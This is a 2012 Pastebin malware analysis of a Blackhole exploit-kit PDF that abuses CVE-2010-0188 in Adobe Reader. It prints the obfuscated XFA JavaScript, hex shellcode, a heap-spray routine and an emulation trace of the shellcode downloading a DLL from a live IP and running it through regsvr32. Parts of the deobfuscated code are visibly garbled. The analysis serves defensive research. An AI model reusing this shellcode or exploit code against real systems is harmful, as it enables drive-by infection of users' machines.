Advertisement
unixfreaxjp

#Malware Analysis - BlackHole PDF CVE-2010-0188 Infector)

Apr 28th, 2012
421
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. I supposed to paste this report to the VT comments, but for some reason I couldn't paste it well. So I put it here. Please refer to the below VT analysis URL for this analysis.
  2. https://www.virustotal.com/file/f3836e899f2cef2338a31be6dae936f0e9ef53f43d677daacfd0e032b3a27253/analysis/
  3. ==========================
  4. Description:
  5. ==========================
  6. [code] This is the malicious PDF used by Exploit Pack (strongly suspected) blackhole for dropping the malware.
  7. The malicious part in this PDF is in obfuscated JavaScript to exploit the privillege using CVE-2010-0188 & executing the shellcode to download and running the malware downloader trojan. [/code]
  8. ==========================
  9. Sample was found here:
  10. ==========================
  11. [code] --22:30:52-- hxxp://188.127.249.241/content/ap2.php?f=696
  12. => 'ap2.php@f=696'
  13. Connecting to 188.127.249.241:80... connected.
  14. HTTP request sent, awaiting response... 200 OK
  15. Length: 24,792 (24K) (application/pdf)
  16. 100%(====================================>) 24,792 25.49K/s
  17. 22:30:54 (25.47 KB/s) - 'ap2.php@f=696' saved (24792/24792) [/code]
  18. *) PLEASE BE NOTED THE PATTERN OF THE URL MARKED ABOVE FOR THE FURTHER INFECTION INVESTIGATION
  19. ==========================
  20. The Malware Code:
  21. ==========================
  22. *) the malware code is located as an object in obfuscated javascript below:
  23. [code] <h:xdp xmlns:h="http://ns.adobe.com/xdp/">
  24. <asd/>as<config xmlns='123'><asd/>
  25. <h:present>
  26. <pdf
  27. <h:interactive>1</h:interactive>
  28. <asd/>a<h:version>1.5</h:version>
  29. a<asd/>
  30. </pdf>
  31. </h:present>
  32. <asd/></config><asd/>
  33. <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
  34. <asd/>
  35. a<subform name="a1"> <pageSet>
  36. <pageArea id="roteYom" name="roteYom">
  37. <contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/>
  38. <medium long="792pt" short="612pt" stock="default"/>
  39. </pageArea>
  40. </pageSet>
  41. <subform name='asdvsa'><field name='qwe123b'><event activity='initialize'>
  42. <h:script contentType='application/x-javascript'>
  43.  
  44. if(this)ar=「-4,
  45.  
  46. -3,
  47.  
  48. -2,
  49. :
  50. (continued for 6,000lines)
  51. :
  52.  
  53. 21,
  54.  
  55. 22,
  56.  
  57. 5」;
  58.  
  59. function test3(){if (s)v=ar「z];s=s& amp;#43;cc[v+4]&#59;}
  60. cc={q:"var pding;b,cefhots_x=w& amp;#65;y()l1'420657839u{.VS'<+I}*/DkR%-W[」mCj^?:LBKQYEUqFM"}.q&#59;
  61. qq=& amp;#39;ghej4vabl'&#59;
q=qq[2」+qq[5]+qq[6];
q=& amp;#113;+qq[8];
b= {v:{q:{x:this}}}.v.q.x&#59;
w= {v:b「q]}.v&#59;
  62. s=Array()&#59;
n={v:cc}.v;
for(i=0;i-3790<0&#59;i++){
  63. z=i&#59;
test3()&#59;
  64. 
}
w(s);

  65. </h:script>a
  66. </event><ui>
  67. <imageEdit/>
  68. </ui>
  69. </field>
  70. </subform>
  71. </subform></template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
  72. <xfa:data><a1 test="123">
  73. </a1>
  74. </xfa:data>
  75. </xfa:datasets>
  76. </h:xdp> [/code]
  77.  
  78. Deobfs above obfs javascript and found the eval with the below shellcode value:
  79. [code] var _l1 = '
  80. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
  81. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  82. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  83. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  84. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  85. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  86. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  87. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  88. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  89. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  90. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  91. 663d36393626653d340000';
  92. var _l2 = '
  93. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  94. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  95. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  96. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  97. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  98. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  99. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  100. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  101. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  102. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  103. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  104. 663d36393626653d340000'; [/code]
  105.  
  106. Complete deobfs will be something like this:
  107. [code]
  108. var padding;
  109. var bbb, ccc, ddd, eee, fff, ggg, hhh;
  110. var pointers_a, i;
  111. var x = new Array();
  112. var y = new Array();
  113. var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
  114. var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
  115. //_l3 = app;
  116. _l4 = new Array();
  117. function _l5()
  118. {
  119. var _l6 = _l3.viewerVersion.toString();
  120. _l6 = _l6.replace('.', '');
  121. while (_l6.length < 4)_l6 += '0';
  122. return parseInt(_l6, 10)
  123. }
  124. function _l7(_l8, _l9)
  125. {
  126. while (_l8.length * 2 < _l9)_l8 += _l8;
  127. return _l8.substring(0, _l9/2)
  128. }
  129. function _I0(_I1)
  130. {
  131. _I1=unescape(_I1);
  132. roteDak=_I1.length*2;
  133. dakRote=unescape('%u9090');
  134. spray=_l7(dakRote,0x2000-roteDak);
  135. loxWhee=_I1+spray;
  136. loxWhee=_l7(loxWhee,524098);
  137. for(i=0; i < 400; i++)_l4「i」=loxWhee.substr(0,loxWhee.length-1)+dakRote;
  138. }
  139. function _I2(_I1,len)
  140. {
  141. while(_I1.length<len)_I1+=_I1;
  142. return _I1.substring(0,len)
  143. }
  144. function _I3(_I1)
  145. {
  146. ret='';
  147. for(i=0;i<_I1.length;i+=2)
  148. {
  149. b=_I1.substr(i,2);
  150. c=parseInt(b,16);
  151. ret+=String.fromCharCode(c);
  152. }
  153. return ret
  154. }
  155. function _ji1(_I1,_I4)
  156. {
  157. _I5='';
  158. for(_I6=0;_I6<_I1.length;_I6++)
  159. {
  160. _l9=_I4.length;
  161. _I7=_I1.charCodeAt(_I6);
  162. _I8=_I4.charCodeAt(_I6%_l9);
  163. _I5+=String.fromCharCode(_I7^_I8);
  164. }
  165. return _I5
  166. }
  167. function _I9(_I6)
  168. {
  169. _j0=_I6.toString(16);
  170. _j1=_j0.length;
  171. _I5=(_j1%2)?'0'+_j0:_j0;
  172. return _I5
  173. }
  174. function _j2(_I1)
  175. {
  176. _I5='';
  177. for(_I6=0;_I6<_I1.length;_I6+=2)
  178. {
  179. _I5+='%u';
  180. _I5+=_I9(_I1.charCodeAt(_I6+1));
  181. _I5+=_I9(_I1.charCodeAt(_I6))
  182. }
  183. return _I5
  184. }
  185. function _j3()
  186. {
  187. _j4=_l5();
  188. _j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK' or _j5='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgED
  189. AAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////;
  190. _j6=_l1;
  191. _j7=_I3(_j6)} [/code]
  192. *) The above strings has similarity w/ the exploit in http://downloads.securityfocus.com/vulnerabilities/exploits/38195.py to be used to feed the crafted TIFF format to the adobe reader.
  193.  
  194. The shellcode (var _l2 & _l1) itself is using urlmon.dll and kernel.dll which is reversed as below:
  195. strings :
  196. [code] 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  197. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  198. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  199. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  200. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  201. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  202. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  203. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  204. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  205. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  206. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
  207. 663d36393626653d340000'; [/code]
  208. ==========================
  209. If you see it in ASCII it will be like this:
  210. ==========================
  211. [code] L.'....J<.'..c.J...J0..Jn/.JAAAA&................9.Jd.'.....AAAA
  212. AAAAf......u4._3.d.@0.@..p.V.v.3.f.^<.t3,........@0.F9.u..4$..uQ
  213. ..LQV.u<.t5x..V.v...3.IA....3....8.t......@..;.u.^.^$..f..K.F..T
  214. $...........^Y..S..h..}.3t.....h...j.Y............XPj@h....P...P
  215. U...^......hon..hurlmT........a......r.......\$...$regs.D$.vr32.
  216. D$..-s.Sh.....V...3.Q.D..wpbt.D...dll.D...Y...0.D..AQj.j.SWj..V.
  217. ..u.j.S.V.j....S.V........G.?.u.G.?.u.j.j..V.......N.......o..3.
  218. .[..Fy6./phXXp://188.127.249.241/content/w.php?f=696&e=4.. [/code]
  219. *) You'll see the download url of the trojan downloader up there.
  220. ==========================
  221. If we reverse shellcode means like below:
  222. ==========================
  223. [code]
  224. 0x7c801ad9|kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
  225. 0x7c801d7b|kernel32.LoadLibraryA(lpFileName=urlmon)
  226. 0x7c835dfa|kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])|
  227. 0x1a494bbe|urlmon.URLDownloadToFileA(pCaller=0, szURL=http://188.127.249.241/content/w.php?f=696&e=4, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)|0
  228. 0x7c86250d|kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
  229. 0x7c86250d|kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
  230. 0x7c81cb3b|kernel32.TerminateThread(dwExitCode=0) [/code]
  231. ==========================
  232. What it means?
  233. ==========================
  234. Means it downloaded from the marked url, and saved locally as wpbt0.dll & silently execute regsvr32 -s as process, for the infection. if you try to download the trojan, it wasn't there anymore, must be cleaned up, I guess this PDF infector was still in server during cleanup.
  235. ==========================
  236. Proof:
  237. ==========================
  238. [code] $ curl "http://188.127.249.241/content/w.php
  239. ?f=696&e=4"
  240. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  241. <html><head>
  242. <title>404 Not Found</title>
  243. </head><body>
  244. <h1>Not Found</h1>
  245. <p>The requested URL /content/w.php was not found on this server.</p>
  246. <p>Additionally, a 404 Not Found
  247. error was encountered while trying to use an ErrorDocument to handle the request
  248. .</p>
  249. <hr>
  250. <address>Apache/2 Server at 188.127.249.241 Port 80</address>
  251. </body></html> [/code]
  252. ------
  253. ZeroDay Japan http://0day.jp
  254. OPERATION CLEANUP JAPAN | #OCJP
  255. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
  256. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
Advertisement
RAW Paste Data Copied
Advertisement